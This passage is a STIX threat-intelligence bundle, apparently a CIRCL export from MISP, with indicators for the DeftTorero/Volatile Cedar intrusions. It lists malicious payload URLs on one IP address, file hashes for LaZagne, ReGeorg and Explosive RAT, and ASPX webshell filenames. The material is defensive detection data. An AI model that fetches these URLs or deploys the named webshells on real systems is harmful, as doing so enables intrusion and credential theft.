1705 lines
No EOL
72 KiB
JSON
1705 lines
No EOL
72 KiB
JSON
{
|
|
"type": "bundle",
|
|
"id": "bundle--2e7a515f-c380-4915-a505-9568ccc00d22",
|
|
"objects": [
|
|
{
|
|
"type": "identity",
|
|
"spec_version": "2.1",
|
|
"id": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2022-10-06T08:15:44.000Z",
|
|
"modified": "2022-10-06T08:15:44.000Z",
|
|
"name": "CIRCL",
|
|
"identity_class": "organization"
|
|
},
|
|
{
|
|
"type": "report",
|
|
"spec_version": "2.1",
|
|
"id": "report--2e7a515f-c380-4915-a505-9568ccc00d22",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2022-10-06T08:15:44.000Z",
|
|
"modified": "2022-10-06T08:15:44.000Z",
|
|
"name": "DeftTorero: tactics, techniques and procedures of intrusions revealed",
|
|
"published": "2022-10-24T09:21:12Z",
|
|
"object_refs": [
|
|
"indicator--36fff9ba-3e97-45f2-abd3-b720b7020d4d",
|
|
"indicator--e4ae6f13-41ef-4955-9eb5-cf7f7ee45373",
|
|
"indicator--8e2e035f-ff9d-48c2-8760-31a59f7a4d07",
|
|
"indicator--c8b20fa5-8fb5-4a8d-b69c-c9bc7c0b142a",
|
|
"indicator--6eb65ccf-abf8-4d91-8b13-9e13234e3b4c",
|
|
"indicator--87f605fa-69e0-4035-952e-024d3a1760be",
|
|
"indicator--747cf011-44fb-4e11-b299-2a71603ccb94",
|
|
"indicator--210ee4ac-7c7a-4d54-875a-312a3503a755",
|
|
"indicator--1cc4cabd-03f9-40b4-a5b7-fee8af302390",
|
|
"indicator--db592c3e-86e5-49f5-b93f-c8c877eabc60",
|
|
"indicator--231b1d67-7f41-4ca5-9d9f-15142756b299",
|
|
"indicator--13b201a9-7228-48f4-89fa-8ae9e3316287",
|
|
"indicator--559f1c1b-5ea9-4cb7-8635-eff4b0dbff67",
|
|
"indicator--3c5b75f1-ab87-4271-ba98-d89820fdba9b",
|
|
"indicator--bda5859a-ba78-49c8-824c-bc5453f43747",
|
|
"x-misp-object--1a66ee6b-c9bc-4567-b3c8-85592349e44e",
|
|
"indicator--a973cd15-c719-4c43-baed-389d38f35d95",
|
|
"indicator--fdb14fbf-8855-4433-86a4-7f37d4dc298a",
|
|
"indicator--525451ee-62dd-43d8-a8b7-55abd922adc7",
|
|
"indicator--c06eacaa-7f97-4d84-99e5-a52624bde69a",
|
|
"indicator--9b5e4f23-aaa3-4904-8697-8ffb60580067",
|
|
"indicator--d2de8e0f-ac72-47d1-8de8-f4843d91970d",
|
|
"indicator--2adbdbd0-5cf9-4142-bc43-0bf7ff1c890d",
|
|
"indicator--5bfc7b92-0962-44ee-a4ed-d5640e1cd6a1",
|
|
"indicator--d992ce91-b710-4f38-ac8c-36e6183d1543",
|
|
"indicator--c4fc319e-0659-4a8a-8cbb-18b2eba56ac1",
|
|
"indicator--f41e258b-608d-49e7-b38b-df2321e2fe0d",
|
|
"indicator--c0ec7d82-7d12-42dc-aeca-0a21eabe33c9",
|
|
"indicator--1045be6d-0c9d-4997-a98d-47f5d32951e0",
|
|
"indicator--78aeb5df-c2ab-48b7-86f9-9c9c7b19e2eb",
|
|
"indicator--85e8cf0d-dafa-40cc-a12c-888b92dd5b85",
|
|
"indicator--053265c5-7ab7-40e2-a284-9cb688db0db7",
|
|
"indicator--b56e1f1f-c63e-44f3-beed-7efc71b29f0a",
|
|
"indicator--6e306200-9536-48d8-ba02-fb7bc6210e93",
|
|
"indicator--0c4e1b7d-9d9a-4fbd-979b-20b4e2a9656d",
|
|
"indicator--f3aa997e-9b85-4bea-b0ea-a3c25bfdf334",
|
|
"indicator--94382d57-bf2b-4230-a0b4-5a4a13d61322",
|
|
"indicator--3290ec45-3315-4cd8-a44a-7b193b3c0e73",
|
|
"indicator--e6d4afb9-8f17-4616-bf11-e2811c4027e4",
|
|
"x-misp-object--e77a5eb2-08b5-4318-a5f2-919b36810acf",
|
|
"x-misp-object--c0f056c7-8f46-459a-be27-b44adc75712f",
|
|
"x-misp-object--335630e4-b15a-4580-ba4b-397949f9a27a",
|
|
"x-misp-object--a2155916-623b-49d9-95f3-0efa3b8c30b7",
|
|
"x-misp-object--115e07f7-3a2b-454a-9739-d258ea48c461",
|
|
"x-misp-object--74aba723-d4a6-4ac1-aeef-1ecc3bce0e59",
|
|
"x-misp-object--4244f8ac-02b4-4e7e-952a-2a5fc074f498",
|
|
"x-misp-object--ce69179a-198c-4251-818b-738836cbc598",
|
|
"x-misp-object--ce6570c7-2cf4-4b21-9d83-46553a2ffb96",
|
|
"x-misp-object--aad0eb86-0f69-43ad-8160-19fd3db38e7c",
|
|
"x-misp-object--b860e3a1-79ca-42bb-bc9e-8eeb0f6afd78",
|
|
"x-misp-object--ce6c6d09-48d0-4943-8373-e05933066fdd",
|
|
"x-misp-object--a7185faa-c1ad-404f-baa6-a05ecd72d479",
|
|
"x-misp-object--5a7223b0-b85e-42cb-a17e-648697e05301",
|
|
"x-misp-object--7caec62a-520f-40f8-9d8c-f8b1f9b6a691",
|
|
"x-misp-object--eaa69f57-9a50-486e-a02b-43e7f5d138ef",
|
|
"x-misp-object--afb5a5bf-5cd9-45e9-b96d-85cce8e11854",
|
|
"x-misp-object--58a63b89-307c-4545-95a2-179cb9fd844a",
|
|
"x-misp-object--28a158a4-784a-47ca-a1b6-af05a6f0c7a4"
|
|
],
|
|
"labels": [
|
|
"Threat-Report",
|
|
"misp:tool=\"MISP-STIX-Converter\"",
|
|
"osint:source-type=\"technical-report\"",
|
|
"cccs:malware_classification=\"webshell\"",
|
|
"cert-ist:malware_type=\"Webshell\"",
|
|
"type:OSINT",
|
|
"osint:lifetime=\"perpetual\"",
|
|
"osint:certainty=\"50\"",
|
|
"misp-galaxy:malpedia=\"MimiKatz\"",
|
|
"misp-galaxy:mitre-enterprise-attack-tool=\"Mimikatz - S0002\"",
|
|
"misp-galaxy:mitre-tool=\"Mimikatz - S0002\"",
|
|
"misp-galaxy:tool=\"Mimikatz\"",
|
|
"misp-galaxy:tool=\"Netcat\"",
|
|
"misp-galaxy:mitre-intrusion-set=\"Volatile Cedar - G0123\"",
|
|
"misp-galaxy:threat-actor=\"Volatile Cedar\""
|
|
],
|
|
"object_marking_refs": [
|
|
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--36fff9ba-3e97-45f2-abd3-b720b7020d4d",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2022-10-04T12:55:01.000Z",
|
|
"modified": "2022-10-04T12:55:01.000Z",
|
|
"pattern": "[url:value = 'http://200.159.87.196:3306/jsJ13j.sct']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2022-10-04T12:55:01Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"url\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--e4ae6f13-41ef-4955-9eb5-cf7f7ee45373",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2022-10-04T12:55:01.000Z",
|
|
"modified": "2022-10-04T12:55:01.000Z",
|
|
"pattern": "[url:value = 'http://200.159.87.196/made.xn--ps1-to0a']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2022-10-04T12:55:01Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"url\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--8e2e035f-ff9d-48c2-8760-31a59f7a4d07",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2022-10-04T12:55:01.000Z",
|
|
"modified": "2022-10-04T12:55:01.000Z",
|
|
"pattern": "[url:value = 'http://200.159.87.196/av.xn--vbs-to0a']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2022-10-04T12:55:01Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"url\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--c8b20fa5-8fb5-4a8d-b69c-c9bc7c0b142a",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2022-10-04T12:55:01.000Z",
|
|
"modified": "2022-10-04T12:55:01.000Z",
|
|
"pattern": "[url:value = 'http://200.159.87.196/1.msi']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2022-10-04T12:55:01Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"url\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--6eb65ccf-abf8-4d91-8b13-9e13234e3b4c",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2022-10-04T12:55:01.000Z",
|
|
"modified": "2022-10-04T12:55:01.000Z",
|
|
"pattern": "[file:hashes.SHA256 = 'f0e6510103deefce338777a81cbfb7529eefa69bafad0d6fd63b4944f916c076']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2022-10-04T12:55:01Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--87f605fa-69e0-4035-952e-024d3a1760be",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2022-10-04T12:55:01.000Z",
|
|
"modified": "2022-10-04T12:55:01.000Z",
|
|
"description": "HackTool:Win32/LaZagne",
|
|
"pattern": "[file:hashes.SHA256 = 'ed2f501408a7a6e1a854c29c4b0bc5648a6aa8612432df829008931b3e34bf56']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2022-10-04T12:55:01Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--747cf011-44fb-4e11-b299-2a71603ccb94",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2022-10-04T12:55:01.000Z",
|
|
"modified": "2022-10-04T12:55:01.000Z",
|
|
"description": "HackTool:JS/ReGeorg",
|
|
"pattern": "[file:hashes.SHA256 = 'c1f43b7cf46ba12cfc1357b17e4f5af408740af7ae70572c9cf988ac50260ce1']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2022-10-04T12:55:01Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--210ee4ac-7c7a-4d54-875a-312a3503a755",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2022-10-04T12:55:01.000Z",
|
|
"modified": "2022-10-04T12:55:01.000Z",
|
|
"description": "Trojan:Win32/Pynamer.B!ac",
|
|
"pattern": "[file:hashes.SHA256 = 'b42725211240828ccc505d193d8ea5915e395c9f43e71496ff0ece4f72e3e4ab']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2022-10-04T12:55:01Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--1cc4cabd-03f9-40b4-a5b7-fee8af302390",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2022-10-04T12:55:01.000Z",
|
|
"modified": "2022-10-04T12:55:01.000Z",
|
|
"description": "TEL:SCPT_LCSuspiPSPattern35",
|
|
"pattern": "[file:hashes.SHA256 = 'a16bdcfa4cc73f87f6eea9795acb75b6b40f80e0bba6394b39f37b7b1fd1f4ad']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2022-10-04T12:55:01Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--db592c3e-86e5-49f5-b93f-c8c877eabc60",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2022-10-04T12:55:01.000Z",
|
|
"modified": "2022-10-04T12:55:01.000Z",
|
|
"pattern": "[file:hashes.SHA256 = '8737f06d7374ff54a9ad728f53c09f89070beca02a305f11fc1e26c8fb33f049']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2022-10-04T12:55:01Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--231b1d67-7f41-4ca5-9d9f-15142756b299",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2022-10-04T13:57:37.000Z",
|
|
"modified": "2022-10-04T13:57:37.000Z",
|
|
"description": "Explosive RAT EXE",
|
|
"pattern": "[file:hashes.MD5 = '53ee31c009e96d4b079ebe3267d0ae8e']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2022-10-04T13:57:37Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--13b201a9-7228-48f4-89fa-8ae9e3316287",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2022-10-04T13:57:37.000Z",
|
|
"modified": "2022-10-04T13:57:37.000Z",
|
|
"description": "Explosive RAT EXE",
|
|
"pattern": "[file:hashes.MD5 = '54ebc45137ba5b9f5ece35ca40267100']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2022-10-04T13:57:37Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--559f1c1b-5ea9-4cb7-8635-eff4b0dbff67",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2022-10-04T13:57:37.000Z",
|
|
"modified": "2022-10-04T13:57:37.000Z",
|
|
"description": "Explosive RAT EXE",
|
|
"pattern": "[file:hashes.MD5 = 'a955b45e14d082f71e01ebc52cf13db8']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2022-10-04T13:57:37Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--3c5b75f1-ab87-4271-ba98-d89820fdba9b",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2022-10-04T13:57:37.000Z",
|
|
"modified": "2022-10-04T13:57:37.000Z",
|
|
"description": "Explosive RAT EXE",
|
|
"pattern": "[file:hashes.MD5 = 'e952ec767d872ea08d8555cbc162f3dc']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2022-10-04T13:57:37Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--bda5859a-ba78-49c8-824c-bc5453f43747",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2022-10-04T13:57:37.000Z",
|
|
"modified": "2022-10-04T13:57:37.000Z",
|
|
"description": "Explosive RAT EXE",
|
|
"pattern": "[file:hashes.MD5 = 'ed50613683b5a4196e0d5fd2687c56da']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2022-10-04T13:57:37Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "x-misp-object",
|
|
"spec_version": "2.1",
|
|
"id": "x-misp-object--1a66ee6b-c9bc-4567-b3c8-85592349e44e",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2022-10-05T09:35:52.000Z",
|
|
"modified": "2022-10-05T09:35:52.000Z",
|
|
"labels": [
|
|
"misp:name=\"report\"",
|
|
"misp:meta-category=\"misc\""
|
|
],
|
|
"x_misp_attributes": [
|
|
{
|
|
"type": "link",
|
|
"object_relation": "link",
|
|
"value": "https://otx.alienvault.com/pulse/633acb17ed56f34d3779a9a4",
|
|
"category": "External analysis",
|
|
"uuid": "49f85d63-6572-408d-8617-a1b94cf303b5"
|
|
},
|
|
{
|
|
"type": "link",
|
|
"object_relation": "link",
|
|
"value": "https://securelist.com/defttorero-tactics-techniques-and-procedures/107610/",
|
|
"category": "External analysis",
|
|
"uuid": "49032ca0-1735-4250-acaf-cfe07fba999b"
|
|
},
|
|
{
|
|
"type": "text",
|
|
"object_relation": "type",
|
|
"value": "Online",
|
|
"category": "Other",
|
|
"uuid": "68f89fe7-3c76-4085-8841-26168b11c786"
|
|
}
|
|
],
|
|
"x_misp_meta_category": "misc",
|
|
"x_misp_name": "report"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--a973cd15-c719-4c43-baed-389d38f35d95",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2022-10-04T14:02:11.000Z",
|
|
"modified": "2022-10-04T14:02:11.000Z",
|
|
"description": "basic ASPX webshell",
|
|
"pattern": "[file:hashes.MD5 = '0a45de1cdf39e0ad67f5d88c730b433a' AND file:name = 'cmd.aspx']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2022-10-04T14:02:11Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "file"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:name=\"file\"",
|
|
"misp:meta-category=\"file\"",
|
|
"misp:to_ids=\"True\"",
|
|
"cert-ist:malware_type=\"Webshell\"",
|
|
"cccs:malware_classification=\"webshell\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--fdb14fbf-8855-4433-86a4-7f37d4dc298a",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2022-10-05T09:35:33.000Z",
|
|
"modified": "2022-10-05T09:35:33.000Z",
|
|
"description": "Tunna webshell",
|
|
"pattern": "[file:hashes.MD5 = '0d6bc7b184f9e1908d4d3fe0a7038a1e' AND file:name = 'c.aspx/conn.aspx']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2022-10-05T09:35:33Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "file"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:name=\"file\"",
|
|
"misp:meta-category=\"file\"",
|
|
"misp:to_ids=\"True\"",
|
|
"cert-ist:malware_type=\"Webshell\"",
|
|
"cccs:malware_classification=\"webshell\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--525451ee-62dd-43d8-a8b7-55abd922adc7",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2022-10-05T09:35:33.000Z",
|
|
"modified": "2022-10-05T09:35:33.000Z",
|
|
"description": "ASPX webshell",
|
|
"pattern": "[file:hashes.MD5 = 'c87a206a9c9846a2d1c3537d459ec03a' AND file:name = 'the.aspx']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2022-10-05T09:35:33Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "file"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:name=\"file\"",
|
|
"misp:meta-category=\"file\"",
|
|
"misp:to_ids=\"True\"",
|
|
"cert-ist:malware_type=\"Webshell\"",
|
|
"cccs:malware_classification=\"webshell\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--c06eacaa-7f97-4d84-99e5-a52624bde69a",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2022-10-05T09:35:33.000Z",
|
|
"modified": "2022-10-05T09:35:33.000Z",
|
|
"description": "Devel webshell",
|
|
"pattern": "[file:hashes.MD5 = '02bcd71a4d7c3a366eff733f92702b81' AND file:name = 'devel.aspx']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2022-10-05T09:35:33Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "file"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:name=\"file\"",
|
|
"misp:meta-category=\"file\"",
|
|
"misp:to_ids=\"True\"",
|
|
"cert-ist:malware_type=\"Webshell\"",
|
|
"cccs:malware_classification=\"webshell\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--9b5e4f23-aaa3-4904-8697-8ffb60580067",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2022-10-05T09:35:33.000Z",
|
|
"modified": "2022-10-05T09:35:33.000Z",
|
|
"description": "reGeorg webshell\r\n",
|
|
"pattern": "[file:hashes.MD5 = 'd6a82b866f7f9e1e01bf89c3da106d9d' AND file:name = 'Banner.aspx']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2022-10-05T09:35:33Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "file"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:name=\"file\"",
|
|
"misp:meta-category=\"file\"",
|
|
"misp:to_ids=\"True\"",
|
|
"cert-ist:malware_type=\"Webshell\"",
|
|
"cccs:malware_classification=\"webshell\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--d2de8e0f-ac72-47d1-8de8-f4843d91970d",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2022-10-05T09:35:33.000Z",
|
|
"modified": "2022-10-05T09:35:33.000Z",
|
|
"description": "webshell",
|
|
"pattern": "[file:hashes.MD5 = 'c59870690803d976014c7c8b58659ddf' AND file:name = '03831a5291724ef2060127f19206eiab.aspx']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2022-10-05T09:35:33Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "file"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:name=\"file\"",
|
|
"misp:meta-category=\"file\"",
|
|
"misp:to_ids=\"True\"",
|
|
"cert-ist:malware_type=\"Webshell\"",
|
|
"cccs:malware_classification=\"webshell\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--2adbdbd0-5cf9-4142-bc43-0bf7ff1c890d",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2022-10-05T09:35:33.000Z",
|
|
"modified": "2022-10-05T09:35:33.000Z",
|
|
"description": "Caterpillar webshell",
|
|
"pattern": "[file:hashes.MD5 = '1ed9169bed85efb1fd5f8d50333252d8' AND file:name = 'aram.aspx']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2022-10-05T09:35:33Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "file"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:name=\"file\"",
|
|
"misp:meta-category=\"file\"",
|
|
"misp:to_ids=\"True\"",
|
|
"cert-ist:malware_type=\"Webshell\"",
|
|
"cccs:malware_classification=\"webshell\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5bfc7b92-0962-44ee-a4ed-d5640e1cd6a1",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2022-10-05T09:35:33.000Z",
|
|
"modified": "2022-10-05T09:35:33.000Z",
|
|
"description": "Caterpillar webshell",
|
|
"pattern": "[file:hashes.MD5 = '2d804386de4073bad642dfc816876d08' AND file:name = 'Pavos.aspx']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2022-10-05T09:35:33Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "file"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:name=\"file\"",
|
|
"misp:meta-category=\"file\"",
|
|
"misp:to_ids=\"True\"",
|
|
"cert-ist:malware_type=\"Webshell\"",
|
|
"cccs:malware_classification=\"webshell\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--d992ce91-b710-4f38-ac8c-36e6183d1543",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2022-10-05T09:35:32.000Z",
|
|
"modified": "2022-10-05T09:35:32.000Z",
|
|
